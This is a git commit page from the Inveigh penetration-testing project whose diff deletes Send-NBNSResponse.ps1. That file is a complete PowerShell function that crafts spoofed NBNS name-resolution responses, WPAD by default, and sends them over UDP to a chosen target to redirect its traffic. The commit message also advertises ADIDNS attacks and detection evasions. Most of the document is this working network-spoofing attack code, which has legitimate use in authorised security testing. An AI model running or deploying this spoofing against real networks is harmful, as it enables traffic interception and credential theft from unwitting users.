aboutsummaryrefslogtreecommitdiff
path: root/Extras/Send-NBNSResponse.ps1
diff options
context:
space:
mode:
authorKevin Robertson <robertsonk@gmail.com>2018-09-25 14:46:02 -0400
committerKevin Robertson <robertsonk@gmail.com>2018-09-25 14:46:02 -0400
commitc9809376e0afb613b3331a79c8ac83c7f48c679a (patch)
treea7b7a36114fb51ea28c4201d838f896aa10427ab /Extras/Send-NBNSResponse.ps1
parenta2553ac147ceddb23bb85f3e37f9b82c626b6e38 (diff)
downloadInveigh-c9809376e0afb613b3331a79c8ac83c7f48c679a.tar.gz
Inveigh-c9809376e0afb613b3331a79c8ac83c7f48c679a.zip
Inveigh 1.41.4
Inveigh Added ADIDNS attacks New detection evasions Inveigh Relay Added session and enumerate attacks Added ability to handle multiple targets with target selection based on the enumerate attack and/or BloodHound imports
Diffstat (limited to 'Extras/Send-NBNSResponse.ps1')
-rw-r--r--Extras/Send-NBNSResponse.ps1105
1 files changed, 0 insertions, 105 deletions
diff --git a/Extras/Send-NBNSResponse.ps1 b/Extras/Send-NBNSResponse.ps1
deleted file mode 100644
index 3d5ed02..0000000
--- a/Extras/Send-NBNSResponse.ps1
+++ /dev/null
@@ -1,105 +0,0 @@
-
-function Send-NBNSResponse
-{
-<#
-.SYNOPSIS
-Send-NBNSResponse sends a crafted NBNS response packet to a specific target. For name resolution to be successful,
-the specified TargetIP, Hostname, and TransactionID must match a very (very very) recent NBNS request. You must
-have an external method (wireshark,etc) of viewing the required NBNS request fields for traffic on the target
-subnet. The odds of pulling this attack off manually are slim due to the narrow response window. I've only been
-able to get it to work manually by watching tshark with the the transaction ID being listed in the output.
-Ideally, this function would be fed by another script.
-
-.PARAMETER Hostname
-Default = WPAD: Specify a hostname for NBNS spoofing.
-
-.PARAMETER NBNSTTL
-Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
-
-.PARAMETER SendPort
-Default = 137: Specify a source port for the NBNS response.
-
-.PARAMETER SpooferIP
-IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system
-other than the function host.
-
-.PARAMETER TargetIP
-IP address to target for the NBNS response.
-
-.PARAMETER TransactionID
-NBNS transaction ID that matches the transaction from the NBNS request.
-
-.EXAMPLE
-Send-NBNSResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e
-
-.LINK
-https://github.com/Kevin-Robertson/Inveigh
-#>
-
-
-[CmdletBinding()]
-param
-(
-[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
-[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="",
-[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="",
-[parameter(Mandatory=$true)][String]$Hostname = "",
-[parameter(Mandatory=$false)][Int]$SendPort="137",
-[parameter(Mandatory=$false)][Int]$NBNSTTL="165",
-[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if ($invalid_parameter)
-{
- throw "$($invalid_parameter) is not a valid parameter."
-}
-
-if(!$SpooferIP)
-{
- $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
-}
-
-$Hostname = $Hostname.ToUpper()
-
-$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
- 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00
-
-$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
-$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
-$hostname_encoded = $hostname_encoded.Replace("-","")
-$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded)
-$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
-[Array]::Reverse($NBNS_TTL_bytes)
-$Transaction_ID_encoded = $TransactionID.Insert(2,'-')
-$Transaction_ID_bytes = $Transaction_ID_encoded.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
-for($i=0; $i -lt $hostname_encoded.Count; $i++)
-{
-
- if($hostname_encoded[$i] -gt 64)
- {
- $hostname_bytes[$i] = $hostname_encoded[$i] + 10
- }
- else
- {
- $hostname_bytes[$i] = $hostname_encoded[$i] + 17
- }
-
-}
-
-$NBNS_response_packet = $Transaction_ID_bytes +
- 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
- $hostname_bytes +
- 0x00,0x20,0x00,0x01 +
- $NBNS_TTL_bytes +
- 0x00,0x06,0x00,0x00 +
- ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
- 0x00,0x00,0x00,0x00
-
-$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort)
-$destination_IP = [System.Net.IPAddress]::Parse($TargetIP)
-$destination_point = New-Object Net.IPEndpoint($destination_IP,137)
-$send_socket.Connect($destination_point)
-$send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length)
-$send_socket.Close()
-} \ No newline at end of file